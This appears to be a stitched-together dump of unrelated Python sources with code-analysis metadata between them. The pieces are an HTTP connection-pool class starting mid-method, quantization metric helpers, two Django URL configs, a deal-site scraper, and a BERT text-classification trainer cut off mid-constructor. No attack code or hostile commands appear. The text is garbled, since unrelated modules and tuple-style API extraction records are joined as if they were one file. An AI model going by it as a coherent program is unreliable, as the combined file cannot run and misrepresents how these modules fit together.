# Can throw a max-connections-reached exception
if oSelf.__bStopping:
return None;
oConnection = oSelf.__fo0GetConnectionAndStartTransaction(
n0zConnectTimeoutInSeconds = n0zConnectTimeoutInSeconds,
bSecure = True,
n0zSecureTimeoutInSeconds = n0zSecureTimeoutInSeconds,
n0zTransactionTimeoutInSeconds = n0zTransactionTimeoutInSeconds,
);
# oConnection can be None only if we are stopping.
if oSelf.__bStopping:
return None;
assert oConnection, \
"A new connection was not established even though we are not stopping!?";
# Returns cResponse instance if response was received.
oResponse = oConnection.fo0SendRequestAndReceiveResponse(
oRequest,
bStartTransaction = False,
u0zMaxStatusLineSize = u0zMaxStatusLineSize,
u0zMaxHeaderNameSize = u0zMaxHeaderNameSize,
u0zMaxHeaderValueSize = u0zMaxHeaderValueSize,
u0zMaxNumberOfHeaders = u0zMaxNumberOfHeaders,
u0zMaxBodySize = u0zMaxBodySize,
u0zMaxChunkSize = u0zMaxChunkSize,
u0zMaxNumberOfChunks = u0zMaxNumberOfChunks,
u0MaxNumberOfChunksBeforeDisconnecting = u0MaxNumberOfChunksBeforeDisconnecting, # disconnect and return response once this many chunks are received.
bEndTransaction = bEndTransaction,
);
if oSelf.__bStopping:
fShowDebugOutput("Stopping.");
return None;
assert oResponse, \
"Expected a response but got %s" % repr(oResponse);
oSelf.fFireCallbacks("request sent and response received", oConnection, oRequest, oResponse);
return oResponse;
@ShowDebugOutput
def __fo0StartTransactionOnExistingConnection(oSelf, n0zTransactionTimeoutInSeconds):
oSelf.__oConnectionsPropertyLock.fAcquire();
try:
for oConnection in oSelf.__aoConnections:
if oSelf.__bStopping:
return None;
if oConnection.fbStartTransaction(n0zTransactionTimeoutInSeconds):
return oConnection;
return None;
finally:
oSelf.__oConnectionsPropertyLock.fRelease();
@ShowDebugOutput
def __foCreateNewConnectionAndStartTransaction(oSelf,
n0zConnectTimeoutInSeconds,
bSecure,
n0zSecureTimeoutInSeconds,
n0zTransactionTimeoutInSeconds
):
# Make sure we would not create too many connections and add a pending connection:
# Can throw a max-connections-reached exception
oSelf.__oConnectionsPropertyLock.fAcquire();
try:
if (
oSelf.__u0MaxNumberOfConnectionsToServer is not None
and len(oSelf.__aoConnections) + oSelf.__uPendingConnects == oSelf.__u0MaxNumberOfConnectionsToServer
):
raise cMaxConnectionsReachedException(
"Cannot create more connections to the server",
{"uMaxNumberOfConnectionsToServer": oSelf.__u0MaxNumberOfConnectionsToServer}
);
oSelf.__uPendingConnects += 1;
finally:
oSelf.__oConnectionsPropertyLock.fRelease();
# Try to establish a connection:
try:
oConnection = cHTTPConnection.foConnectTo(
sbHostname = oSelf.__oServerBaseURL.sbHostname,
uPortNumber = oSelf.__oServerBaseURL.uPortNumber,
n0zConnectTimeoutInSeconds = n0zConnectTimeoutInSeconds,
o0SSLContext = oSelf.__o0SSLContext if bSecure else None,
n0zSecureTimeoutInSeconds = n0zSecureTimeoutInSeconds,
f0ResolveHostnameCallback = oSelf.__fHandleResolveHostnameCallback
);
except Exception as oException:
oSelf.fFireCallbacks("connect failed", oSelf.__oServerBaseURL.sbHostname, oSelf.__oServerBaseURL.uPortNumber, oException);
# remove a pending connection.
oSelf.__oConnectionsPropertyLock.fAcquire();
try:
oSelf.__uPendingConnects -= 1;
finally:
oSelf.__oConnectionsPropertyLock.fRelease();
raise;
# Start a transaction to prevent other threads from using it:
assert oConnection.fbStartTransaction(n0zTransactionTimeoutInSeconds), \
"Cannot start a transaction on a new connection (%s)" % repr(oConnection);
# remove a pending connection and add it.
oSelf.__oConnectionsPropertyLock.fAcquire();
try:
oSelf.__uPendingConnects -= 1;
oSelf.__aoConnections.append(oConnection);
finally:
oSelf.__oConnectionsPropertyLock.fRelease();
# Add some event handlers
oConnection.fAddCallback("bytes written", oSelf.__fHandleBytesWrittenCallbackFromConnection);
oConnection.fAddCallback("bytes read", oSelf.__fHandleBytesReadCallbackFromConnection);
oConnection.fAddCallback("request sent", oSelf.__fHandleRequestSentCallbackFromConnection);
oConnection.fAddCallback("response received", oSelf.__fHandleResponseReceivedCallbackFromConnection);
oConnection.fAddCallback("terminated", oSelf.__fHandleTerminatedCallbackFromConnection);
oSelf.fFireCallbacks("new connection", oConnection);
return oConnection;
def __fHandleResolveHostnameCallback(oSelf, sbHostname, iFamily, sCanonicalName, sIPAddress):
oSelf.fFireCallbacks("hostname resolved", sbHostname = sbHostname, iFamily = iFamily, sCanonicalName = sCanonicalName, sIPAddress = sIPAddress);
def __fHandleBytesWrittenCallbackFromConnection(oSelf, oConnection, sbBytesWritten):
oSelf.fFireCallbacks("bytes written", oConnection, sbBytesWritten);
def __fHandleBytesReadCallbackFromConnection(oSelf, oConnection, sbBytesRead):
oSelf.fFireCallbacks("bytes read", oConnection, sbBytesRead);
def __fHandleRequestSentCallbackFromConnection(oSelf, oConnection, oRequest):
oSelf.fFireCallbacks("request sent", oConnection, oRequest);
def __fHandleResponseReceivedCallbackFromConnection(oSelf, oConnection, oResponse):
oSelf.fFireCallbacks("response received", oConnection, oResponse);
@ShowDebugOutput
def __fHandleTerminatedCallbackFromConnection(oSelf, oConnection):
oSelf.__oConnectionsPropertyLock.fAcquire();
try:
oSelf.__aoConnections.remove(oConnection);
bCheckIfTerminated = oSelf.__bStopping and len(oSelf.__aoConnections) == 0;
finally:
oSelf.__oConnectionsPropertyLock.fRelease();
oSelf.fFireCallbacks("connection terminated", oConnection);
if bCheckIfTerminated:
oSelf.__fReportTerminatedIfNoMoreConnectionsExist();
def fasGetDetails(oSelf):
uConnectionsCount = oSelf.uConnectionsCount;
bTerminated = oSelf.bTerminated;
return [s for s in [
str(oSelf.__oServerBaseURL.sbBase, 'latin1'),
"%d connections" % uConnectionsCount if not bTerminated else None,
"secure" if oSelf.__o0SSLContext else None,
"terminated" if bTerminated else
"stopping" if oSelf.__bStopping else None,
] if s];
def __repr__(oSelf):
sModuleName = ".".join(oSelf.__class__.__module__.split(".")[:-1]);
return "<%s.%s#%X|%s>" % (sModuleName, oSelf.__class__.__name__, id(oSelf), "|".join(oSelf.fasGetDetails()));
def __str__(oSelf):
return "%s#%X{%s}" % (oSelf.__class__.__name__, id(oSelf), ", ".join(oSelf.fasGetDetails()));
for cException in acExceptions:
setattr(cHTTPConnectionsToServerPool, cException.__name__, cException);
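# Illustrative aside, not part of the original module: the same lock-protected
# "pending connection" bookkeeping used above, reduced to plain threading
# primitives. All names below (cTinyPool, foGetConnection, ...) are placeholders.
import threading;

class cTinyPool(object):
  def __init__(oSelf, fConnect):
    oSelf.__fConnect = fConnect;        # callable that returns a connection or raises.
    oSelf.__oLock = threading.Lock();
    oSelf.__uPendingConnects = 0;
    oSelf.__aoConnections = [];
  def foGetConnection(oSelf):
    with oSelf.__oLock:
      oSelf.__uPendingConnects += 1;    # reserve a slot before the slow connect.
    try:
      oConnection = oSelf.__fConnect();
    except Exception:
      with oSelf.__oLock:
        oSelf.__uPendingConnects -= 1;  # roll the reservation back on failure.
      raise;
    with oSelf.__oLock:
      oSelf.__uPendingConnects -= 1;    # turn the reservation into a tracked connection.
      oSelf.__aoConnections.append(oConnection);
    return oConnection;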
| [
"mMultiThreading.cLock",
"mDebugOutput.fShowDebugOutput"
] | [((1342, 1466), 'mMultiThreading.cLock', 'cLock', (["('%s.__oConnectionsPropertyLock' % oSelf.__class__.__name__)"], {'n0DeadlockTimeoutInSeconds': 'gnDeadlockTimeoutInSeconds'}), "('%s.__oConnectionsPropertyLock' % oSelf.__class__.__name__,\n n0DeadlockTimeoutInSeconds=gnDeadlockTimeoutInSeconds)\n", (1347, 1466), False, 'from mMultiThreading import cLock, cWithCallbacks\n'), ((1771, 1896), 'mMultiThreading.cLock', 'cLock', (["('%s.__oTerminatedEventFiredLock' % oSelf.__class__.__name__)"], {'n0DeadlockTimeoutInSeconds': 'gnDeadlockTimeoutInSeconds'}), "('%s.__oTerminatedEventFiredLock' % oSelf.__class__.__name__,\n n0DeadlockTimeoutInSeconds=gnDeadlockTimeoutInSeconds)\n", (1776, 1896), False, 'from mMultiThreading import cLock, cWithCallbacks\n'), ((1944, 2014), 'mMultiThreading.cLock', 'cLock', (["('%s.__oTerminatedLock' % oSelf.__class__.__name__)"], {'bLocked': '(True)'}), "('%s.__oTerminatedLock' % oSelf.__class__.__name__, bLocked=True)\n", (1949, 2014), False, 'from mMultiThreading import cLock, cWithCallbacks\n'), ((3586, 3646), 'mDebugOutput.fShowDebugOutput', 'fShowDebugOutput', (['"""cHTTPConnectionsToServerPool terminated."""'], {}), "('cHTTPConnectionsToServerPool terminated.')\n", (3602, 3646), False, 'from mDebugOutput import ShowDebugOutput, fShowDebugOutput\n'), ((3890, 3921), 'mDebugOutput.fShowDebugOutput', 'fShowDebugOutput', (['"""Stopping..."""'], {}), "('Stopping...')\n", (3906, 3921), False, 'from mDebugOutput import ShowDebugOutput, fShowDebugOutput\n'), ((4467, 4500), 'mDebugOutput.fShowDebugOutput', 'fShowDebugOutput', (['"""Terminated..."""'], {}), "('Terminated...')\n", (4483, 4500), False, 'from mDebugOutput import ShowDebugOutput, fShowDebugOutput\n'), ((6252, 6293), 'mDebugOutput.fShowDebugOutput', 'fShowDebugOutput', (['"""Getting connection..."""'], {}), "('Getting connection...')\n", (6268, 6293), False, 'from mDebugOutput import ShowDebugOutput, fShowDebugOutput\n'), ((3769, 3807), 'mDebugOutput.fShowDebugOutput', 'fShowDebugOutput', (['"""Already terminated"""'], {}), "('Already terminated')\n", (3785, 3807), False, 'from mDebugOutput import ShowDebugOutput, fShowDebugOutput\n'), ((3848, 3884), 'mDebugOutput.fShowDebugOutput', 'fShowDebugOutput', (['"""Already stopping"""'], {}), "('Already stopping')\n", (3864, 3884), False, 'from mDebugOutput import ShowDebugOutput, fShowDebugOutput\n'), ((4423, 4461), 'mDebugOutput.fShowDebugOutput', 'fShowDebugOutput', (['"""Already terminated"""'], {}), "('Already terminated')\n", (4439, 4461), False, 'from mDebugOutput import ShowDebugOutput, fShowDebugOutput\n'), ((9235, 9264), 'mDebugOutput.fShowDebugOutput', 'fShowDebugOutput', (['"""Stopping."""'], {}), "('Stopping.')\n", (9251, 9264), False, 'from mDebugOutput import ShowDebugOutput, fShowDebugOutput\n')] |
# Copyright (C) 2020-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from copy import deepcopy
from functools import partial
import numpy as np
import scipy
from addict import Dict
from ....algorithms.quantization import utils as eu
from ....engines.ac_engine import ACEngine
from ....graph.model_utils import get_nodes_by_type
from ....graph.node_utils import get_all_node_outputs
from ....graph.utils import find_operation_matches
from ....samplers.creator import create_sampler
SPECIAL_METRICS = ['cmc', 'reid_map', 'pairwise_accuracy_subsets', 'pairwise_accuracy', 'normalized_embedding_accuracy',
'face_recognition_tafa_pair_metric', 'localization_recall',
                   'coco_orig_keypoints_precision', 'coco_orig_segm_precision']
METRICS_CONFIGS = {'sigmoid_recom_loss': {'metrics': 'log_loss',
'postprocessing': 'sigmoid_normalize_recommendation'},
'coco_precision': {'metrics': 'coco_precision'},
'coco_segm_precision': {'metrics': 'coco_segm_precision'}}
METRIC2PROXY_METRIC = {
'hit_ratio':
{
'persample': 'sigmoid_recom_loss',
'ranking': 'sigmoid_recom_loss'
},
'ndcg':
{
'persample': 'sigmoid_recom_loss',
'ranking': 'sigmoid_recom_loss'
},
'coco_orig_precision':
{
'persample': 'coco_precision'
},
'coco_orig_keypoints_precision':
{
'persample': 'coco_precision'
},
'coco_orig_segm_precision':
{
'persample': 'coco_segm_precision'
}
}
def create_metric_config(engine, algo_config: Dict, force_logit_comparison=False,
logit_distance_type='cosine') -> Dict:
def create_metric_params(metric_name):
engine_metrics_attributes = engine.get_metrics_attributes()
if metric_name not in engine_metrics_attributes:
            raise RuntimeError('Couldn\'t create metric parameters. '
                               'Metric {} not registered in the engine.'.format(metric_name))
params = Dict()
params.name = metric_name
params.type = engine_metrics_attributes[metric_name]['type']
params.is_special = (params.type in SPECIAL_METRICS) or force_logit_comparison
if engine_metrics_attributes[metric_name]['direction'] == 'higher-better':
params.comparator = (lambda a: a)
elif engine_metrics_attributes[metric_name]['direction'] == 'higher-worse':
params.comparator = (lambda a: -a)
else:
raise ValueError('Unexpected {} metric direction value.'.format(metric_name))
params.sort_fn = partial(sort_by_logit_distance, distance=logit_distance_type) \
if params.is_special else partial(sort_by_metric_difference, comp_fn=params.comparator)
return params
def metric_to_proxy_map(metrics):
"""Determines which metrics need proxy metrics and creates metrics to proxy metrics map.
:param metrics: optimizable metrics names
        :returns a dictionary of metrics to proxy metrics mapping
                 {metric_name: {'persample': proxy_name, 'ranking': proxy_name}},
a list of proxy metrics names to register
"""
def update_proxy_list(proxy_metric_name):
"""Updates a list of proxy metrics names to register.
:return a proxy metric name in accordance with the engine naming
"""
proxy_config = METRICS_CONFIGS.get(proxy_metric_name, {})
metric_config = proxy_config.get('metrics')
postprocessing_config = proxy_config.get('postprocessing')
if metric_config or postprocessing_config:
to_register.add(proxy_metric_name)
return metric_name_from_config(metric_config)
match_names_config = Dict({metric_name: {} for metric_name in metrics})
to_register = set()
for metric_name, metric_type in metrics:
if metric_type in METRIC2PROXY_METRIC:
persample_metric_name = METRIC2PROXY_METRIC[metric_type].get('persample')
persample_proxy_metric_name = update_proxy_list(persample_metric_name)
if persample_proxy_metric_name:
match_names_config[metric_name].persample = persample_proxy_metric_name
ranking_metric_name = METRIC2PROXY_METRIC[metric_type].get('ranking')
ranking_proxy_metric_name = update_proxy_list(ranking_metric_name)
if ranking_proxy_metric_name:
match_names_config[metric_name].ranking = ranking_proxy_metric_name
return match_names_config, list(to_register)
metrics_attributes = engine.get_metrics_attributes()
# configure which metrics to optimize
if algo_config.metrics:
metrics_names = []
for metric in algo_config.metrics:
metric_type = metric.type if metric.type else metric.name
metrics_names.append((metric.name, metric_type))
else:
metrics_names = [(metric_name, metric_attr.get('type', metric_name)) for metric_name, metric_attr
in metrics_attributes.items()]
# register proxy metrics
metrics_to_proxy_map, metrics_to_register = metric_to_proxy_map(metrics_names)
register_metrics(engine, metrics_to_register)
metrics_config = Dict()
for metric, _ in metrics_names:
persample_name = metrics_to_proxy_map[metric].get('persample', metric)
ranking_name = metrics_to_proxy_map[metric].get('ranking', metric)
metrics_config[metric].persample = create_metric_params(persample_name)
metrics_config[metric].ranking = create_metric_params(ranking_name)
metrics_config[metric].update(create_metric_params(metric))
return metrics_config
def metric_name_from_config(metric_config):
if isinstance(metric_config, str):
return metric_config
if isinstance(metric_config, dict):
return metric_config.get('name', metric_config['type'])
return None
def register_metrics(engine, metrics_names: list):
"""Registers metrics and postprocessing in the engine.
:param engine: an engine in which metrics will be registered
:param metrics_names: a list of metrics names
"""
registered_metrics = engine.get_metrics_attributes()
for metric in metrics_names:
if metric not in METRICS_CONFIGS:
raise ValueError('Cannot register metric. Unsupported name {}.'.format(metric))
proxy_config = METRICS_CONFIGS.get(metric, {})
if 'metrics' in proxy_config:
metric_config = proxy_config['metrics']
if metric_name_from_config(metric_config) not in registered_metrics:
register_metric(engine, metric_config)
if 'postprocessing' in proxy_config:
postprocessing_config = proxy_config['postprocessing']
register_postprocessing(engine, postprocessing_config)
def sort_by_logit_distance(u, v, reverse=False, distance='cosine'):
if len(u) != len(v):
raise RuntimeError('Cannot compare samples. '
'Lists of per-sample metric results should be the same length.')
kd_distance = lambda u, v: scipy.stats.entropy(scipy.special.softmax(u),
scipy.special.softmax(v))
mse_distance = lambda u, v: np.mean((u - v) ** 2)
distance_function = {
'cosine': scipy.spatial.distance.cosine,
'kd': kd_distance,
'mse': mse_distance,
}
distance_between_samples = np.array([distance_function[distance](ui.flatten(), vi.flatten())
for ui, vi in zip(u, v)])
sorted_arr = np.argsort(distance_between_samples)
if reverse:
sorted_arr = np.flip(sorted_arr)
return sorted_arr
def sort_by_metric_difference(u, v, comp_fn=lambda a: a, reverse=False):
if len(u) != len(v):
raise RuntimeError('Cannot compare samples. '
'Lists of per-sample metric results should be the same length.')
u = np.asarray(u)
v = np.asarray(v)
sorted_arr = np.argsort(comp_fn(u - v))
if reverse:
sorted_arr = np.flip(sorted_arr)
return sorted_arr
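# Illustrative usage of the two sorters above (an aside, not part of the
# original module); the per-sample values below are made up.
def _example_rank_samples():
    fp_logits = [np.array([2.0, 0.1, -1.0]), np.array([0.3, 0.2, 0.1])]
    int8_logits = [np.array([1.9, 0.2, -0.9]), np.array([-0.5, 1.0, 0.4])]
    # Indices ordered by ascending logit distance (most similar sample first).
    by_logits = sort_by_logit_distance(fp_logits, int8_logits, distance='cosine')
    fp_metric = [0.9, 0.4]     # per-sample metric of the original model
    int8_metric = [0.7, 0.45]  # per-sample metric of the quantized model
    # Indices ordered by ascending metric drop (least degraded sample first).
    by_metric = sort_by_metric_difference(fp_metric, int8_metric)
    return by_logits, by_metric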
def register_metric(engine, metric_config):
if isinstance(engine, ACEngine):
engine.add_metric(metric_config)
else:
raise NotImplementedError('{} engine cannot register new metrics.'
.format(type(engine).__name__))
def register_postprocessing(engine, postprocessing_config):
if isinstance(engine, ACEngine):
engine.add_postprocessing(postprocessing_config)
else:
raise NotImplementedError('{} engine cannot register new postprocessing.'
.format(type(engine).__name__))
def is_preset_performance(config: Dict):
if config.weights.mode == 'symmetric' and config.activations.mode == 'symmetric':
return True
if config.weights.mode == 'asymmetric' or config.activations.mode == 'asymmetric':
return False
if config.preset == 'performance':
return True
return False
def get_mixed_preset_config(config: Dict):
config = deepcopy(config)
config.update(preset='mixed')
if config.activations.mode:
config.activations.mode = 'asymmetric'
if config.weights.mode:
config.weights.mode = 'symmetric'
return config
def get_num_of_quantized_ops(model, quantizable_operations):
quantized_ops = set()
nodes_to_see = []
for fq_node in get_nodes_by_type(model, ['FakeQuantize']):
nodes_to_see.extend(get_all_node_outputs(fq_node))
while nodes_to_see:
child = nodes_to_see.pop()
if find_operation_matches(quantizable_operations, child):
quantized_ops.add(child)
continue
nodes_to_see.extend(get_all_node_outputs(child))
return len(quantized_ops)
def evaluate_model(
model, engine,
dataset_size,
subset_indices=None,
print_progress=True,
metrics_config=None,
per_sample_subset_indices=None,
output_node_name=None,
stats_layout=None,
):
"""Evaluates the model and processes metrics values
:param model: model to evaluate
:param subset_indices: image indices to evaluate on. If None evaluate on whole dataset
:param per_sample_subset_indices: image indices for which to return per-sample metrics.
If None for all predicted images
:param print_progress: Whether to print inference progress
:returns a dictionary of predicted metrics {metric_name: value}
a dictionary of per-sample metrics values {metric_name: [values]}
"""
engine.set_model(model)
eu.select_evaluation_dataset(engine)
if not subset_indices:
subset_indices = range(dataset_size)
index_sampler = create_sampler(engine, samples=subset_indices)
(metrics_per_sample, metrics), raw_output = engine.predict(stats_layout=stats_layout,
sampler=index_sampler,
metric_per_sample=True,
print_progress=print_progress)
raw_output = process_raw_output(raw_output, output_node_name)
metrics_per_sample = process_per_sample_metrics(metrics_per_sample,
metrics_config,
per_sample_subset_indices,
raw_output=raw_output)
metrics = dict((name, value) for name, value in metrics.items() if name in metrics_config)
eu.reset_dataset_to_default(engine)
return metrics, metrics_per_sample
def process_raw_output(output, output_node_name):
if not output:
return []
return output[output_node_name]['output_logits']
def process_per_sample_metrics(metrics_per_sample, metrics_config,
indices=None, raw_output=None):
"""Creates a dictionary of per-sample metrics values {metric_name: [values]}
:param metrics_per_sample: list of per-sample metrics
:param indices: indices of samples to be considered. All if None
:param raw_output: raw output from the model
:return processed dictionary
"""
metrics_to_keep = {config.persample.name: config.persample
for config in metrics_config.values()}
if not metrics_to_keep:
return {}
processed_metrics_per_sample = dict((name, []) for name in metrics_to_keep)
for metric_name, metric_params in metrics_to_keep.items():
if metric_params.is_special:
processed_metrics_per_sample[metric_name] = raw_output
for value in metrics_per_sample:
if value['metric_name'] in metrics_to_keep:
if metrics_to_keep[value['metric_name']].is_special:
continue
if value['result'] is not None:
result_value = np.nanmean(value['result'])
else:
result_value = None
processed_metrics_per_sample[value['metric_name']].append(result_value)
# check that all metrics have equal number of samples
if not len({len(value) for value in processed_metrics_per_sample.values()}) == 1:
raise RuntimeError('Inconsistent number of per-sample metric values')
if indices:
for name, values in processed_metrics_per_sample.items():
processed_metrics_per_sample[name] = [values[i] for i in indices]
return processed_metrics_per_sample
| [
"addict.Dict",
"numpy.mean",
"numpy.flip",
"numpy.asarray",
"numpy.argsort",
"numpy.nanmean",
"functools.partial",
"copy.deepcopy",
"scipy.special.softmax"
] | [((5558, 5564), 'addict.Dict', 'Dict', ([], {}), '()\n', (5562, 5564), False, 'from addict import Dict\n'), ((7929, 7965), 'numpy.argsort', 'np.argsort', (['distance_between_samples'], {}), '(distance_between_samples)\n', (7939, 7965), True, 'import numpy as np\n'), ((8299, 8312), 'numpy.asarray', 'np.asarray', (['u'], {}), '(u)\n', (8309, 8312), True, 'import numpy as np\n'), ((8321, 8334), 'numpy.asarray', 'np.asarray', (['v'], {}), '(v)\n', (8331, 8334), True, 'import numpy as np\n'), ((9438, 9454), 'copy.deepcopy', 'deepcopy', (['config'], {}), '(config)\n', (9446, 9454), False, 'from copy import deepcopy\n'), ((2174, 2180), 'addict.Dict', 'Dict', ([], {}), '()\n', (2178, 2180), False, 'from addict import Dict\n'), ((4016, 4066), 'addict.Dict', 'Dict', (['{metric_name: {} for metric_name in metrics}'], {}), '({metric_name: {} for metric_name in metrics})\n', (4020, 4066), False, 'from addict import Dict\n'), ((7587, 7608), 'numpy.mean', 'np.mean', (['((u - v) ** 2)'], {}), '((u - v) ** 2)\n', (7594, 7608), True, 'import numpy as np\n'), ((8003, 8022), 'numpy.flip', 'np.flip', (['sorted_arr'], {}), '(sorted_arr)\n', (8010, 8022), True, 'import numpy as np\n'), ((8416, 8435), 'numpy.flip', 'np.flip', (['sorted_arr'], {}), '(sorted_arr)\n', (8423, 8435), True, 'import numpy as np\n'), ((2763, 2824), 'functools.partial', 'partial', (['sort_by_logit_distance'], {'distance': 'logit_distance_type'}), '(sort_by_logit_distance, distance=logit_distance_type)\n', (2770, 2824), False, 'from functools import partial\n'), ((2865, 2926), 'functools.partial', 'partial', (['sort_by_metric_difference'], {'comp_fn': 'params.comparator'}), '(sort_by_metric_difference, comp_fn=params.comparator)\n', (2872, 2926), False, 'from functools import partial\n'), ((7452, 7476), 'scipy.special.softmax', 'scipy.special.softmax', (['u'], {}), '(u)\n', (7473, 7476), False, 'import scipy\n'), ((7529, 7553), 'scipy.special.softmax', 'scipy.special.softmax', (['v'], {}), '(v)\n', (7550, 7553), False, 'import scipy\n'), ((13422, 13449), 'numpy.nanmean', 'np.nanmean', (["value['result']"], {}), "(value['result'])\n", (13432, 13449), True, 'import numpy as np\n')] |
from django.urls import path, include
from rest_framework.authtoken import views
from .views import home
urlpatterns = [
path('', home, name='api.home'),
path('category/', include('api.category.urls')),
path('product/', include('api.product.urls')),
path('order/', include('api.order.urls')),
path('payment/', include('api.payment.urls')),
path('user/', include('api.user.urls')),
]
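# Illustrative sketch (hypothetical, not shipped with this file): a minimal
# api/category/urls.py of the kind that include('api.category.urls') above
# would pull in. The view names are placeholders.
#
#   from django.urls import path
#   from . import views
#
#   urlpatterns = [
#       path('', views.category_list, name='api.category.list'),
#       path('<int:pk>/', views.category_detail, name='api.category.detail'),
#   ]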
| [
"django.urls.path",
"django.urls.include"
] | [((126, 157), 'django.urls.path', 'path', (['""""""', 'home'], {'name': '"""api.home"""'}), "('', home, name='api.home')\n", (130, 157), False, 'from django.urls import path, include\n'), ((181, 209), 'django.urls.include', 'include', (['"""api.category.urls"""'], {}), "('api.category.urls')\n", (188, 209), False, 'from django.urls import path, include\n'), ((233, 260), 'django.urls.include', 'include', (['"""api.product.urls"""'], {}), "('api.product.urls')\n", (240, 260), False, 'from django.urls import path, include\n'), ((282, 307), 'django.urls.include', 'include', (['"""api.order.urls"""'], {}), "('api.order.urls')\n", (289, 307), False, 'from django.urls import path, include\n'), ((331, 358), 'django.urls.include', 'include', (['"""api.payment.urls"""'], {}), "('api.payment.urls')\n", (338, 358), False, 'from django.urls import path, include\n'), ((379, 403), 'django.urls.include', 'include', (['"""api.user.urls"""'], {}), "('api.user.urls')\n", (386, 403), False, 'from django.urls import path, include\n')] |
from django.urls import path
from notes_app import views
urlpatterns = [
    path('', views.home, name='home'),
    path('home/', views.home, name='home'),
    path('add/', views.add, name='add'),
    path('edit/<int:id>', views.edit, name='edit'),
    path('delete/<int:id>', views.delete, name='delete')
]
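# Illustrative note (an aside, not part of the original urls.py): if this module
# is the project's root URLconf, the named routes above can be reversed, e.g.
#   reverse('edit', args=[3])    -> '/edit/3'
#   {% url 'delete' note.id %}   -> '/delete/<id>'
# (assumes django.urls.reverse is imported where it is used).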
| [
"django.urls.path"
] | [((77, 110), 'django.urls.path', 'path', (['""""""', 'views.home'], {'name': '"""home"""'}), "('', views.home, name='home')\n", (81, 110), False, 'from django.urls import path\n'), ((114, 152), 'django.urls.path', 'path', (['"""home/"""', 'views.home'], {'name': '"""home"""'}), "('home/', views.home, name='home')\n", (118, 152), False, 'from django.urls import path\n'), ((156, 191), 'django.urls.path', 'path', (['"""add/"""', 'views.add'], {'name': '"""add"""'}), "('add/', views.add, name='add')\n", (160, 191), False, 'from django.urls import path\n'), ((195, 241), 'django.urls.path', 'path', (['"""edit/<int:id>"""', 'views.edit'], {'name': '"""edit"""'}), "('edit/<int:id>', views.edit, name='edit')\n", (199, 241), False, 'from django.urls import path\n'), ((245, 297), 'django.urls.path', 'path', (['"""delete/<int:id>"""', 'views.delete'], {'name': '"""delete"""'}), "('delete/<int:id>', views.delete, name='delete')\n", (249, 297), False, 'from django.urls import path\n')] |
import requests
from bs4 import BeautifulSoup
from .sections import *
SITE_PELANDO_COMPUTADORES = "https://www.pelando.com.br/grupo/computadores-e-informatica"
SITE_PELANDO_TECEESCRITORIO = "https://www.pelando.com.br/grupo/tecnologia-e-escritorio"
SITE_PELANDO_SMARTPHONES = "https://www.pelando.com.br/grupo/celulares-e-smartphones"
SITE_PELANDO_LIVROS = "https://www.pelando.com.br/grupo/livros"
SITE_PELANDO_VIDEOGAMES = "https://www.pelando.com.br/grupo/videogames"
ALL_SECTIONS = {
SECTION_COMPUTADORES: SITE_PELANDO_COMPUTADORES,
SECTION_TECEESCRITORIO: SITE_PELANDO_TECEESCRITORIO,
SECTION_SMARTPHONES: SITE_PELANDO_SMARTPHONES,
SECTION_LIVROS: SITE_PELANDO_LIVROS,
SECTION_VIDEOGAMES: SITE_PELANDO_VIDEOGAMES
}
def scrapePelandoSection(section=None, output=None):
    "Receives a section URL and a Queue object from the standard multiprocessing library. The results are put on the Queue."
request_phase_success = True
result = []
try:
source = requests.get(section).text
soup = BeautifulSoup(source,'lxml')
promotion = soup.select('article.thread.thread--type-card')
section_name = section.split('/')[-1].split('?')[0]
except Exception as e:
print("Error during request phase")
print(e)
request_phase_success = False
if request_phase_success:
for item in promotion:
try:
temperatura = item.select("span.vote-temp")[0].text.split('°')[0].strip()
if temperatura.lower() != "super quente!":
id = item.get('id')
titulo = item.select("a.thread-link.thread-title--card")[0].text.strip()
valor = item.select("span.thread-price")[0].text.strip()
result.append({"id": id,"nome": titulo, "valor": valor, "temperatura": temperatura, "section": section_name})
except IndexError as e:
                # Skip items that are missing one of the fields
pass
except Exception as e:
                print("Error: {} in {}".format(e, section))
output.put(result)
    print("## {} FINISHED ##".format(section))
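# Illustrative driver (an aside, not part of the original module): runs one
# worker process per section and drains the shared Queue. It relies only on
# ALL_SECTIONS and scrapePelandoSection as defined above.
if __name__ == "__main__":
    from multiprocessing import Process, Queue
    output = Queue()
    workers = [Process(target=scrapePelandoSection, args=(url, output))
               for url in ALL_SECTIONS.values()]
    for worker in workers:
        worker.start()
    deals = []
    for _ in workers:
        deals.extend(output.get())  # each worker puts exactly one list of results
    for worker in workers:
        worker.join()
    print("{} promotions collected".format(len(deals)))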
| [
"bs4.BeautifulSoup",
"requests.get"
] | [((1034, 1063), 'bs4.BeautifulSoup', 'BeautifulSoup', (['source', '"""lxml"""'], {}), "(source, 'lxml')\n", (1047, 1063), False, 'from bs4 import BeautifulSoup\n'), ((992, 1013), 'requests.get', 'requests.get', (['section'], {}), '(section)\n', (1004, 1013), False, 'import requests\n')] |
from collections import defaultdict
import time
from joblib import Parallel, delayed
from multiprocessing import cpu_count
from math import ceil
import torch
from torch import nn
import torch.multiprocessing as mp
import torch.distributed as dist
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.data import TensorDataset, DataLoader, SequentialSampler
from torch.utils.data.distributed import DistributedSampler
from nltk.corpus import stopwords
from transformers import AdamW, get_linear_schedule_with_warmup
# =================================================================================
#from transformers.models.camembert.tokenization_camembert import CamembertTokenizer
from transformers import BertTokenizer
# =================================================================================
import numpy as np
import os
import shutil
import sys
from tqdm import tqdm
from LOTClass.bert.model import LOTClassModel
import warnings
warnings.filterwarnings("ignore")
class LOTClassTrainer(object):
def __init__(self, args):
self.args = args
self.verbose = args.verbose
self.max_len = args.max_len
self.dataset_dir = args.dataset_dir
self.dist_port = args.dist_port
self.num_cpus = min(10, cpu_count() - 1) if cpu_count() > 1 else 1
self.world_size = args.gpus
self.train_batch_size = args.train_batch_size
self.eval_batch_size = args.eval_batch_size
self.accum_steps = args.accum_steps
eff_batch_size = self.train_batch_size * self.world_size * self.accum_steps
assert abs(eff_batch_size - 128) < 10, f"Make sure the effective training batch size is around 128, current: {eff_batch_size}"
print(f"Effective training batch size: {eff_batch_size}")
self.pretrained_lm = args.pretrained_lm
self.tokenizer = BertTokenizer.from_pretrained(self.pretrained_lm, do_lower_case=True)
#self.tokenizer = CamembertTokenizer.from_pretrained(self.pretrained_lm, force_download=True)
self.vocab = self.tokenizer.get_vocab()
self.vocab_size = len(self.vocab)
self.mask_id = self.vocab[self.tokenizer.mask_token]
self.inv_vocab = {k:v for v, k in self.vocab.items()}
